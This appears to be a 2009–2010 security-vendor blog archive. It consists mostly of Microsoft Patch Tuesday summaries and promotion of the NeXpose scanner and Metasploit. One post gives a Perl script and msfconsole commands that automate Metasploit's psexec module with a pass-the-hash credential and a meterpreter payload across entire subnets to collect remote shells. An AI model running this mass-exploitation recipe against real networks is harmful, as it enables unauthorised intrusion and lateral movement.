• March 09th, 2010
  • 0

March Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in Community, Patch Tuesday

Time once again for this month’s summary of the latest Microsoft Security updates …

2 advisories, with 8 vulnerabilities covered. This is the lightest March update since Microsoft skipped March altogether back in 2007.

Here’s the breakdown:

MS10-016: Rated Important. Potential Remote Code Execution in Windows Movie Maker, covering 1 vulnerability: CVE-2010-0265 (Buffer Overflow in Movie Maker and Producer). A few things to note about this one …

First, Microsoft chose not to patch the exposure in Producer 2003. Apparently the decision is based on the application’s limited distribution and the fact that automatic updates are not available for Producer. Given the use of Producer with PowerPoint, this one could be a cost benefit analysis by Microsoft in that there might be additional code to check which isn’t justified by limited distribution. If there is no outcry from the community, this one will remain unpatched; if some noise is generated, expect to see more activity from Microsoft in response. Who knows … perhaps we’ll see some creativity from the threat community within malicious online PowerPoint presentations.

Second, user interaction is required for this one. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

Third, this one is easy to overlook as few people will view Movie Maker as business critical technology. With the rapidly growing use of rich media online (punctuated by Cisco’s CRS-3 announcement today), this one could come back to bite people in the behind a year from now. If it happens, you heard it here first.

MS10-017: Rated Important. Potential Remote Code Execution in Excel, Excel Viewer, Office for Mac, Office Compatibility Pack, and the Excel Services (which are in the default configuration for SharePoint Server 2007), covering 7 vulnerabilities: CVE-2010-0257 (Record Memory Corruption), CVE-2010-0258 (Sheet Object Type Confusion), CVE-2010-0260 (MDXTUPLE Record Heap Overflow), CVE-2010-0261 (MDXSET Record Heap Overflow), CVE-2010-0262 (FNGROUPNAME Record Uninitialized Memory), CVE-2010-0263 (XLSX File Parsing), and CVE-2010-0264 (DbOrParamQry Record Parsing). This one replaces MS09-067 from November of last year along with MS09-021 from June of last year on SharePoint. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

Clearly the highest priority this month, test the update and roll it out in relatively short order. Excel is everywhere in the enterprise and you’re advised to not overlook Excel Services running on SharePoint Server 2007.

MS09-033 was re-released today, as Virtual Server 2005 was added to the affected products list. If you’re running Virtual Server 2005, be sure to pull this one into your remediation activities as well – after Excel and before Movie Maker.

After last month’s monster update, this is a light one. Advice is to patch Excel first and if you’re running Movie Maker, schedule the update in short order. If you’re running Producer, Microsoft provides assistance to disable file type association so a malicious file would have to be opened manually rather than launching the app from a careless click.

As with every month, NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect these and every other Microsoft vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) with publicly available exploits on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

Post Your Comment

  • February 23rd, 2010
  • 0

Introducing Exploit Exposure

Posted by Richard Li in Community, Exploits, General

We just released a new version of NeXpose to all of our users that has a new technology we call Exploit Exposure ™. Exploit Exposure will now give you exploit information about a particular vulnerability. Why is this important? The Rapid7 vulnerability database contains checks for over 12,000 vulnerabilities, and most organizations have a lot of vulnerabilities that need to be prioritized – more vulnerabilities than they have time to correct.  Now, with Exploit Exposure, you will know which vulnerabilities have real exploits (thanks to our links to both Metasploit and Exploit Database) and you can fix those vulnerabilities first.

Exploit Exposure

In addition, NeXpose uses the exploit ranking data from the Metasploit team to classify the skill level required for a given exploit. Since you can’t predict the skill level of an attacker, we strongly recommend that you immediately remediate any vulnerability that has a live exploit, regardless of the skill level required for an exploit or the number of exploits available for a given vulnerability. At the same time, we wanted to give you the full information so you can make an informed decision.

With Exploit Exposure, NeXpose tells you what you need to remediate right now without needing to buy any other products, Google for a vulnerability, or search. This tells you your real-world risk and what you need to remediate. Unlike patch-centric prioritization schemes which can lull administrators into a false sense of security, this vulnerability-centric approach covers all known exploit paths into your system. For example, a 0-day vulnerability is flagged immediately (given the presence of an exploit) even if a patch is not yet available. We give you possible remediation actions for 0-days (e.g., add a firewall rule) so that your organization is protected.

This is just the tip of the iceberg in terms of what we want to accomplish by sharing data between NeXpose and Metasploit, so stay tuned for more. I’m also interested in hearing your feedback, so please post to the nexpose-users mailing list or a comment in the blog below. If you want to see Exploit Exposure firsthand, download the free NeXpose Community Edition.

Post Your Comment

  • February 09th, 2010
  • Comments Off

February Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in Patch Tuesday

Time for this month’s summary of the latest Microsoft Security updates …

13 advisories, with 26 vulnerabilities covered. This is the busiest February update ever.

Here’s the breakdown:

MS10-003: Rated Important. Potential Remote Code Execution in Office XP and Office 2004 for Mac, covering 1 vulnerability: CVE-2010-0243 (Buffer Overflow in MSO.DLL). This one replaces the MS09-062 GDI+ patch from last October. Important to note that user interaction is required for this one. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

MS10-004: Rated Important. Potential Remote Code Execution in PowerPoint 2002, 2003, and Office 2004 for Mac, covering 6 vulnerabilities: CVE-2010-0029 (File Path Handling Buffer Overflow), CVE-2010-0030 (Heap Overflow), CVE-2010-0031 (Invalid Array Indexing), CVE-2010-0032 (Use After Free), CVE-2010-0033 (Viewer TextBytesAtom Record Stack Overflow), and CVE-2010-0034 (Viewer TextCharsAtom Record Stack Overflow). This one replaces MS09-017 from May of last year. Microsoft rates it as Exploit Index: 1; Deployment Priority: 2.

MS10-005: Rated Moderate. Potential Remote Code Execution in Microsoft Paint, covering 1 vulnerability: CVE-2010-0028 (JPEG image decoding). This is my favourite vulnerability this month … jpg decoding in paint?? Awesome. Microsoft rates it as Exploit Index: 2; Deployment Priority 3. I love that this is not the lowest priority update this month … 2 others have a lower Exploit Index.

MS10-006: Rated Critical. Potential Remote Code Execution in all supported Windows versions, covering 2 vulnerabilities: CVE-2010-0016 (SMB Client Pool Corruption), and CVE-2010-0017 (Client Race Condition). This one allows unauthenticated attacks, however a client must initiate an SMB request. Microsoft rates it as Exploit Index: 1; and is one of five with a Deployment Priority of 1.

MS10-007: Rated Critical. Potential Remote Code Execution in Windows Shell Handler, affecting Windows 2000, XP, and Server 2003, covering 1 vulnerability: CVE-2010-0027 (URL Validation). Microsoft rates it as Exploit Index: 1; Deployment Priority 1.

MS10-008: Rated Critical. Cumulative ActiveX Kill Bits Update, “covering” 1 vulnerability: CVE-2010-0252 (Data Analyzer ActiveX Control). This one replaces the ActiveX Cumulative update MS09-055 from November of last year. Microsoft rates it as Deployment Priority: 1; Exploit Index is not applicable because … hey, it’s a cumulative update for ActiveX Kill Bits.

MS10-009: Rated Critical. Potential Remote Code Execution in Windows TCP/IP, covering 4 vulnerabilities: CVE-2010-0239 (ICMPv6 Router Advertisement), CVE-2010-0240 (Header MDL Fragmentation), CVE-2010-0241 (ICMPv6 Route Information), and CVE-2010-0242 (TCP/IP Selective Acknowledgement). This one affects Vista and Server 2008. Microsoft rates it as Exploit Index: 2; Deployment Priority 2, stating that the Remote Code Execution is not likely to see PoC in the near term. We’ll be watching this one to see if they are correct.

MS10-010: Rated Important. Potential Denial of Service in Hyper-V on Server 2008 and Server 2008 R2, covering 1 vulnerability: CVE-2010-0026 (Instruction Set Validation). As predicted, this one is pushed to the bottom of Microsoft’s severity list with Exploit Index: 3; Deployment Priority: 3. We’ll be watching to see if attackers start dropping Hyper-V from guests hosted on 2008 and/or 2008 R2 machines. If so, expect the Security versus Availability debate to rear its ugly head (again).

MS10-011: Rated Important. Potential Elevation of Privilege in Windows Client/Server Runtime Subsystem on Windows 2000, XP, and Server 2003, covering 1 vulnerability: CVE-2010-0023 (CSRSS Local Privilege Elevation). The root of the issue is that user processes are not properly terminated on logout. Microsoft rates it as Exploit Index: 1; Deployment Priority 2.

MS10-012: Rated Important. Potential Remote Code Execution in SMB Server affecting all supported versions of Windows, covering 4 vulnerabilities: CVE-2010-0020 (Pathname Overflow), CVE-2010-0021 (Memory Corruption), CVE-2010-0022 (Null Pointer), CVE-2010-0031 (NTLM Auth Lack of Entropy). This is this month’s SMB Server side issue. Microsoft rates it as Exploit Index: 1; Deployment Priority 2.

MS10-013: Rated Critical. Potential Remote Code Execution in DirectShow, covering 1 vulnerability: CVE-2010-0250 (Heap Overflow). Everyone will be talking about this one because people love DirectShow exposures. Be careful when viewing videos via Bing, I suppose … user interaction is required and you don’t want to be that guy/girl. Affecting all versions of Windows, Microsoft rates it as Exploit Index: 1; Deployment Priority: 1.

MS10-014: Rated Important. Potential Denial of Service in Kerberos affecting Windows 2000 Server, Server 2003, and Server 2008, covering 1 vulnerability: CVE-2010-0035 (Null Pointer Dereference). This one actually looks quite interesting, with clients on remote, non-Windows realms in a mixed-mode implementation able to cause Domain Controllers to stop responding. As with almost every DoS Microsoft has ever patched, this one is at the bottom of the severity list with the Hyper-V issue. Microsoft rates it as Exploit Index 3; Deployment Priority: 3.

MS10-015: Rated Important. Potential Elevation of Privilege in Windows Kernel affecting every supported Windows version except Windows 7 and Server 2008 R2, covering 2 vulnerabilities: CVE-2010-0232 (Exception Handler), and CVE-2010-0233 (Double Free). This is the good old 16 bit support issue that’s apparently been shipping for about 17 years; discovered by Tavis Ormandy from Google. Disabling NTVDM will work around the Exception Handler issue; no workaround for the Double Free issue. Microsoft rates it as Exploit Index 1 (because it’s already public); Deployment Priority: 1 (because it’s already public). This is the only one this month that has public exploit code cited by Microsoft in their summary.

With most enterprises coming out of their year end production change freeze, Microsoft is putting out a mountain of updates this month. Similar to last October’s monster update, this is going to be a busy one for everyone with every version of Windows affected. 32 bit Server platforms and Older workstation versions are hit hardest, with Windows 2000, XP, Server 2003, and Server 2008 R1 seeing 9, 8, 9, and 8 updates respectively (5, 5, 4, and 3 critical). Having said that, there is no Windows version with less than 5 updates this month.

Fortunately, the list of affected products is much smaller than October’s update so it should be easier to test and roll out patches for these 26 vulnerabilities. In many cases, there are still unpatched vulnerabilities from October in larger enterprises. As the risk of vulnerabilities consistently rises over time, it is important to get this month’s updates distributed so companies can continue to test lingering issues from last year and prepare for the IE and SMB issues that were not addressed by Microsoft this month.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect this vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) with publicly available exploits on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals about the Microsoft release.

As always, Happy patching!!

Post Your Comment

  • February 04th, 2010
  • Comments Off

February Microsoft Patch Tuesday Preview

Posted by Sheldon Malm in Patch Tuesday

Sheldon here with a quick preview of next week’s Microsoft Patch Tuesday updates …

If you’re on the customer side, you have a lot of patching to do starting next week. If you’re on the Security Research side, order some extra pizza and chill an extra case of Red Bull … this is going to be a busy one.

13 bulletins coming out on Tuesday – the most ever in February by my count. Last year was lighter than usual … we usually see 11 or 12 in February. December and January is usually light, so February is a busy clean-up month for Microsoft Security Updates. Last month’s out-of-band IE update put February under 14 updates, but it’s a February bulletin record and ties last October for the most Patch Tuesday updates.

2 Denial of Service; 2 Elevation of Privilege; and 9 Remote Code Execution.

2 updates for Office; 11 for Windows, with 26 (yes, 26) total vulnerabilities addressed.

Here’s a breakdown by affected software:

WINDOWS:

- Windows 2000: 9 updates … 5 Critical; 3 Important; and 1 Moderate

- Windows XP: 8 updates … 5 Critical; 2 Important; and 1 Moderate

- Server 2003: 9 updates … 4 Critical; 3 Important; 2 Moderate

- Vista: 6 updates … 3 Critical; and 3 Important

- Server 2008: 8 updates … 3 Critical; 4 Important; and 1 Low

- Windows 7: 5 updates … 3 Critical; and 2 Important

- Server 2008 R2: 5 updates … 3 Critical; 1 Important; and 1 Low

OFFICE:

- Office XP: 2 updates … 2 Important

- Office 2003: 1 update … 1 Important

- Office 2004 for Mac: 2 updates … 2 Important

Interesting to note, there are 2 known issues that will not be addressed on Tuesday.

The first one is the IE “Information Disclosure” vulnerability that some have described as “turning your PC into an Internet File Server”. Catchy … wish I’d thought of that description. No word yet if this will result in an out-of-band update or if it will wait until March or later. (Metasploit might have more influence on that decision than internal Microsoft processes — too early to say at this point). That’s advisory 980088.

The second one is the SMB DoS vulnerability that Microsoft discussed in advisory 977544 back in November. They are still working through that update, and as we’ve noted several times in the past, Microsoft is not known for rushing DoS fixes.

Microsoft *is* patching an issue that is 17 years in the making, however. This one only affects 32 bit Windows versions and the exposure lies in the NT Virtual DOS Machine (NTVDM) subsystem that’s been around since the early Windows NT days. For those who aren’t aware, VDM allows 32 bit Windows versions to run 16 bit applications and MS-DOS. If you’re not running 16 bit apps, this should have no impact on you. If you are still running 16 bit apps, I hope they’re not mission critical.

We’ll have more information for you when the advisories come out on Tuesday. Until then, get some rest … if you’re reading this, you’ll likely need it.

Post Your Comment

  • January 22nd, 2010
  • Comments Off

The True Value of “Free” in Vulnerability Management

Posted by Bernd Leger in Community, Patch Tuesday, Security Best Practices

Yesterday proved to be another busy day for the security community with Microsoft’s out of band security update for Internet Explorer. We’ve already blogged about the positive impact that Metasploit and the broader security community are having on increasing the awareness for major security issues.

Within 24 hours of the security update, we’ve included coverage for these vulnerabilities across all of our product lines, including NeXpose Community Edition. What’s interesting here is with the Community Edition, Rapid7 is the only vendor that provides a free solution for commercial use that has up-to-date vulnerability coverage within 24 hours. Something to think about for all those organizations that use commercial and open source offerings that have delayed vulnerability updates…

Post Your Comment

  • January 21st, 2010
  • Comments Off

January Out of Band Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in General

After a quiet Patch Tuesday last week with only one vulnerability announced, that calm has been followed by a bit of a storm. Here is a quick summary of this month’s summary of Microsoft’s Out of Band Security update …

1 updates, with 8 vulnerabilities covered. Here’s the breakdown:

MS10-002: Rated Critical. Potential Remote Code Execution, covering 8 vulnerabilities: CVE-2009-4074 (XSS Filter Script Handling), CVE-2010-0027 (URL Validation), CVE-2010-0244 (Uninitialized Memory Corruption), CVE-2010-0245 (Uninitialized Memory Corruption), CVE-2010-0246 (Uninitialized Memory Corruption), CVE-2010-0247 (Uninitialized Memory Corruption), CVE-2010-0248 (HTML Object Memory Corruption), and CVE-2010-0249 (HTML Object Memory Corruption). This update replaces MS09-072 from December of last year, which was critical for all platforms except Server 2003 and Server 2008.

As with MS09-072, this one needs a little more explanation to lay out what severity ratings map to what:

BY IE VERSION
- IE 5.01 & 6 are rated Critical on Windows 2000
- IE 6, 7, & 8 are rated Critical on XP
- IE 6 is rated *MODERATE*, IE 7 & 8 are rated *CRITICAL* on Server 2003
- MS09-072 was reversed: Critical on IE 6; Moderate on IE 7 & 8 for Server 2003
- IE 7 & 8 are rated Critical on Vista
- IE 7 & 8 are rated *CRITICAL* on Server 2008
- MS09-072 was rated Moderate for Server 2008
- IE 8 is rated *CRITICAL* on Server 2008 R2
- MS09-072 was rated Moderate for Server 2008 R2
- IE 8 is rated Critical on Windows 7

BY VULNERABILITY
- CVE-2009-4074:
- Moderate (Information Disclosure) for IE 8 on XP, Vista, and Windows 7
- Low (Information Disclosure) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0027:
- Critical (Remote Code Execution) for IE 7 on XP, Server 2003, Vista, Server 2008, and Windows 7
- Critical (Remote Code Execution) for IE 8 on XP, Server 2003, Vista, Server 2008, Windows 7, and Server 2008 R2

- CVE-2010-0244:
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003, Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0245:
- Critical (Remote Code Execution) for IE 8 on XP and Vista
- Moderate (Remote Code Execution) for IE 8 on Server 2003 and Server 2008
- Low (Denial of Service) for IE 8 on Windows 7 and Server 2008 R2

- CVE-2010-0246:
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0247:
- Critical (Remote Code Execution) for IE 5.01 on Windows 2000
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate for IE 6 on Server 2003

- CVE-2010-0248:
- Critical (Remote Code Execution) for IE 6 on Windows 2000, XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003 and Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for Server 2003, Server 2008, and Server 2008 R2

- CVE-2010-0249:
- Critical (Remote Code Execution) for IE 6 on Windows 2000 and XP
- Moderate (Remote Code Execution) for IE 6 on Server 2003
- Critical (Remote Code Execution) for IE 7 on XP and Vista
- Moderate (Remote Code Execution) for IE 7 on Server 2003 and Server 2008
- Critical (Remote Code Execution) for IE 8 on XP, Vista, and Windows 7
- Moderate (Remote Code Execution) for IE 8 on Server 2003, Server 2008, and Server 2008 R2

Hopefully this makes things a little clearer.

There has been a lot of buzz about this one, and we’d like to take a moment to thank the research community (and our own Metasploit team) for raising the profile of this issue and helping to raise the priority for Microsoft’s update(s). As expected, there are some who would paint the efforts of community researchers and the Metasploit project as “enabling the bad guys”. This could not be further from the truth … underestimating the severity of an existing risk does nothing to protect systems from compromise. Customers are getting the IE fix nearly 3 weeks earlier due in part to the availability of public exploit code and supporting research. Despite the fact that Microsoft has known about the issue since August, we believe they should be applauded for their responsiveness following the release of public exploit code. We feel very strongly that this is an example of community research prompting vendor actions that are ultimately in the best interest of customers.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect these vulnerabilities and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

Post Your Comment

  • January 19th, 2010
  • Comments Off

The Story Behind NeXpose Community Edition

Posted by Richard Li in Community, Security Best Practices

Hi, I’m the product manager here at Rapid7 and one of the many people behind the Community Edition. I joined Rapid7 in July after spending my last eight years with Red Hat. Before that, I worked at another open source software company. Naturally, I have strong opinions on why open source and community-driven software is a fundamentally better way to build and release software.

With that as a background, I thought I’d take some time and explain the motivation and philosophy behind NeXpose community Edition and why we decided to do it. At Rapid7, we’ve always been big believers in open disclosure as the best way to improve security.  The community-driven security process works. In the software industry, the momentum is clearly a trend towards openness and community. Some software companies are doing it just for the marketing (and it shows), but many others are actively embracing community and openness as part of their DNA. It’s not necessarily an easy or free process, but at the end of it, there are incredible benefits – starting with better software and happier customers.

As a group, we looked at the security market and at vulnerability management in particular, and we didn’t see a transition from closed to open. Surprisingly, we saw the opposite – a trend from open to closed. We think that this is bad for security, bad for customers, and bad for the community. And so it became apparent that releasing a free, unrestricted version of NeXpose would be a good thing.

But before we did that, I wanted to have a conversation internally about why we were doing it. I wanted to make sure that Rapid7 as a company was committed to investing in the community, instead of just releasing a free version of NeXpose and then hoping a community would materialize, because communities don’t just appear for free. So we had some active, spirited conversations about this and we decided, as a company, that we are committed to building a community.

We then had the debate about what features to include in Community Edition. After all, we are a for-profit company and we do have a duty to our shareholders to make money. Simultaneously, we wanted something that would be generically useful for everyone, and not just for a few. So we decided that, while we would impose some limitations (mostly around the number of IPs and some enterprise features), we would actually release with a license that does not restrict use as well as real-time vulnerability updates (including our 24 hour Microsoft patch Tuesday updates).

So, after that decision, in the last quarter of 2009, Rapid7 dramatically expanded the number of full-time engineers working on the free, open source version of Metasploit. We launched NeXpose Community Edition with flexible license terms and real-time vulnerability updates. We released Metasploit + NeXpose integration. We launched community.rapid7.com . We’ve responded to some of the initial feedback from the community, with more reporting functionality and improved usability. We’ve just barely started and we won’t stop.
Stay tuned for more.

Post Your Comment

  • January 12th, 2010
  • Comments Off

January Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in General

A new year, a new decade, and time once again for this month’s summary of the latest Microsoft Security updates … actually, that’s *update*.

1 update, with 1 vulnerability covered. Here’s the breakdown:

MS10-001: Rated Critical. Potential Remote Code Execution via integer overflow in LZCOMP Decompressor of the Embedded OpenType (EOT) Font Engine, covering 1 vulnerability: CVE-2010-0018. Important to note that Windows 2000 is rated critical; all others are rated low. This update replaces MS09-029 from July of last year, which was critical across the board.

Also interesting to note: Microsoft has specifically called out that the SMB DoS exposure is not being addressed today as they are still conducting research. No indication if this will be released as a subsequent out-of-band issue or whether we’ll see it in a future Patch Tuesday, although Microsoft does not have a history of addressing DoS exposures out of band.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect this vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

Post Your Comment

  • December 18th, 2009
  • Comments Off

Metasploit PSEXEC scanner (via Perl)

Posted by Jabra in General

Metasploit’s pexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish that Metasploit had, is a scanner version of the psexec exploit module. So I decided to build my own with Perl.

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc… We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH.

First, we build a small Perl script to generate a configuration file:


#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser Administrator\n";
print "set SMBPass ADMINISTRATOR:HASH\n";
print "set PAYLOAD windows/meterpreter/bind_tcp\n";
# first range
foreach(1.. 254) {
    print "set RHOST 192.168.1.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}
# second range
foreach(1.. 254) {
    print "set RHOST 192.168.2.$_\n";
    print "exploit\n";
    print "sleep 2\n";
}

Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

perl psexec-192-168.pl > psexec.rc

Lastly, we leverage Metasploit’s ability to execute commands passed into meterpreter via an resource file. Once Metasploit loads psexc.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to create an exploit scanner.

msfconsole -r psexec.rc

Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells.

Regards,
Jabra

Post Your Comment

  • December 08th, 2009
  • Comments Off

December Microsoft Patch Tuesday Roundup

Posted by Sheldon Malm in General

Time once again for this month’s summary of the latest Microsoft Security updates. NeXpose (including the free NeXpose Community Edition) users will have coverage within 24 hours or less. Metasploit already had a module for the IE exposure. Here’s the breakdown …

6 updates, with 12 vulnerabilities covered. Here’s the breakdown:

MS09-069: Rated Critical. Potential Denial of Service via ISAKMP through IPsec affecting LSASS, covering 1 vulnerability: CVE-2009-3675. Important to note that Windows 2000, XP, and 2003 are affected; newer versions of Windows are not affected.

MS09-070: Rated Important. Potential Remote Code Execution and Elevation of Privilege in Active Directory Federation Services, covering 2 vulnerabilities: CVE-2009-2508 (Moderate; Spoofing) and CVE-2009-2509 (Important; Remote Code Execution). Important to note that the Spoofing exposure requires the attacker to obtain a valid authentication token. While this is a practical exposure on Internet kiosks, etc., most enterprises should have this covered under common best practices. The Remote Code Execution exposure has a significant impact to ADFS enabled Web servers, however the attacker must have valid credentials to exploit this vulnerability.

MS09-071: Rated Critical. Potential Remote Code Execution and Elevation of Privilege in Internet Authentication Service, covering 2 vulnerabilities: CVE-2009-2505 (Protected Extensible Authentication Protocol) and CVE-2009-3677 (Challenge Handshake Authentication Protocol version 2). The CHAP-2 vulnerability allows Elevation of Privilege across all supported Window versions except Windows 7 and Server 2008 R2. The PEAP exposure only affects Vista and Server 2008 when configured to use PEAP with CHAP-2 authentication. Important to note that IAS is Microsoft’s version of a RADIUS proxy and server, and PEAP provides authentication for 802.1x wireless clients, so this exposure presents a real risk for client-side wireless attacks.

MS09-072: Rated Critical. Potential Remote Code Execution in Internet Explorer 5.01, 6, 7, and 8, covering 5 vulnerabilities: CVE-2009-2493 (ATL COM Initialization), CVE-2009-3671 (Uninitialized Memory Corruption), CVE-2009-3672 (HTML Object Memory Corruption), CVE-2009-3673 (Uninitialized Memory Corruption), and CVE-2009-3674 (Uninitialized Memory Corruption). This one needs a little more explanation to lay out what severity ratings map to what:

BY IE VERSION
- IE 5.01 & 6 are rated Critical on Windows 2000
- IE 6, 7, & 8 are rated Critical on XP
- IE 6 is rated Critical, IE 7 & 8 are rated Moderate on Server 2003
- IE 7 & 8 are rated Critical on Vista
- IE 7 & 8 are rated Moderate on Server 2008
- IE 8 is rated Moderate on Server 2008 R2
- IE 8 is rated Critical on Windows 7

BY VULNERABILITY
- CVE-2009-2493:
- Critical for IE 5.01 on Windows 2000
- Critical for IE 6 on Windows 2000, XP, and 2003

- CVE-2009-3671:
- Critical for IE 8 on XP, Vista, and Windows 7
- Moderate for IE 8 on 2003 and 2008

- CVE-2009-3672:
- Critical for IE 6 on Windows 2000 and XP
- Critical for IE 7 on XP and Vista
- Moderate for IE 6 on 2003
- Moderate for IE 7 on 2003 and 2008

- CVE-2009-3673:
- Critical for IE 7 on XP and Vista
- Critical for IE 8 on XP, Vista, and Windows 7
- Moderate for IE 7 on 2003 and 2008
- Moderate for IE 8 on 2003, 2008, and 2008 R2

- CVE-2009-3674:
- Critical for IE 8 on XP, Vista, and Windows 7
- Moderate for IE 8 on 2003, 2008, and 2008 R2

MS09-073: Rated Important. Potential Remote Code Execution via Word 97 file conversion, affecting Windows 2000, XP, and 2003, Works 8.5/WordPad, Word 2002, Word 2003, and Office Converter Pack, covering 1 vulnerability: CVE-2009-2506. It’s fun to see WordPad implicated in a vulnerability, but this one is not at the top of the priority list for this month.

MS09-074: Rated Important. Potential Remote Code Execution via XXXX affecting MS Project, covering 1 vulnerability: CVE-2009-0102. Important to note that this one is only Critical for Project 2000; rated Important for Project 2002 and 2003. While the Impact of this vulnerability is real, the likelihood of successful, widespread attacks against Project is pretty slim (let alone successful attacks against Project 2000). These are not typically externally facing systems and are not as widely deployed as Operating Systems, Standard Office components, etc.

So … patch IE, patch Internet Authentication Server, and prioritize the rest based on your environment and testing/deployment schedule.

NeXpose Community Edition, the free version of NeXpose, will have coverage within 24 hours of the release. NeXpose Community Edition will allow you to detect this vulnerability and, if you wish, launch Metasploit Security Testing to confirm the presence and exploitability of the exposure(s) on up to 32 hosts in your environment. For small environments with 32 nodes or less, you can use NeXpose to provide free detection within 24 hours of Microsoft’s update release.

For larger environments, even if NeXpose is not your current Enterprise Vulnerability Management solution, we invite you to download Community Edition and run it alongside your tool on Wednesday to audit the effectiveness of your solution on up to 32 hosts.

NeXpose Community Edition is available for immediate download at no cost here: http://www.rapid7.com/nexposecommunitydownload.jsp

We also invite you to visit the Community Portal at http://community.rapid7.com to share information with other Security Professionals following the Microsoft release.

As always, Happy patching!!

Post Your Comment

Older Posts »